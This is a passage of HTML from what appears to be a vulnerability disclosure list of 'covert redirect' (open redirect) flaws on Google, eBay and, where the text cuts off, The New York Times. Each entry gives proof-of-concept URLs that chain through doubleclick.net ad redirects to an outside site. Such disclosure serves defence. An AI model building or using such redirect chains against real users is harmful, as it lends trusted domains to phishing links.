<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/Logout?service=<wbr></wbr>writely&continue=https://<wbr></wbr>google.com/</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/Logout?service=wise&<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.tetraph.<wbr></wbr>com%2Fsecurity</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=btuSq89khcQ&feature=youtu.be</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://computerobsess.<wbr></wbr>blogspot.com/2014/11/google-<wbr></wbr>covert-redirect-vulnerability.<wbr></wbr>html</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.2) </b></span><b>eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net</b></span></div>
<div style="margin: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">ebay.com</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"eBay
Inc. (stylized as ebay) is an American multinational corporation and
e-commerce company, providing consumer to consumer & business to
consumer sales services via Internet. It is headquartered in San Jose,
California, United States. eBay was founded by Pierre Omidyar in 1995,
and became a notable success story of the dot-com bubble. Today, it is a
multi-billion dollar business with operations localized in over thirty
countries. The company manages eBay.com, an online auction and shopping
website in which people and businesses buy and sell a broad variety of
goods and services worldwide. In addition to its auction-style sales,
the website has since expanded to include "Buy It Now" shopping;
shopping by UPC, ISBN, or other kind of SKU (via Half.com); online
classified advertisements (via Kijiji or eBay Classifieds); online event
ticket trading (via StubHub); online money transfers (via PayPal) and
other services. It is not a free website, but charges users an invoice
fee when sellers have sold or listed any items." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/" style="background-color: white;" target="_blank">http://rover.ebay.com/rover/1/<wbr></wbr>711-67261-24966-0/2?mtid=691&<wbr></wbr>kwid=1&crlp=1_263602&itemid=<wbr></wbr>370825182102&mpre=http://<wbr></wbr>googleads.g.doubleclick.net/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://rover.ebay.com/rover/1/<wbr></wbr>711-67261-24966-0/2?mtid=691&<wbr></wbr>kwid=1&crlp=1_263602&itemid=<wbr></wbr>370825182102&mpre=http://<wbr></wbr>googleads.g.doubleclick.net/<wbr></wbr>aclk?sa=L%26ai=C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV%<wbr></wbr>26num=0%26sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ%<wbr></wbr>26client=ca-pub-<wbr></wbr>0466582109566532%26adurl=http:<wbr></wbr>//www.tetraph.com/security</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=a4H-u17Y9ks" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=a4H-u17Y9ks</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://tetraph.blogspot.com/2014/11/ebay-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://tetraph.blogspot.com/<wbr></wbr>2014/11/ebay-covert-redirect-<wbr></wbr>vulnerability.html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.3) </b></span><b>The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net</b></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">nytimes.com</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"The
New York Times (NYT) is an American daily newspaper, founded and
continuously published in New York City since September 18, 1851, by the
New York Times Company. It has won 114 Pulitzer Prizes, more than any
other news organization. The paper's print version has the largest
circulation of any metropolitan newspaper in the United States, and the
second-largest circulation overall, behind The Wall Street Journal. It
is ranked 39th in the world by circulation. Following industry trends,
its weekday circulation has fallen to fewer than one million daily since
1990. Nicknamed for years as "The Gray Lady", The New York Times is
long regarded within the industry as a national "newspaper of record".
It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr.,
(whose family (Ochs-Sulzberger) has controlled the paper for five
generations, since 1896), is both the paper's publisher and the
company's chairman. Its international version, formerly the
International Herald Tribune, is now called the International New York
Times." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
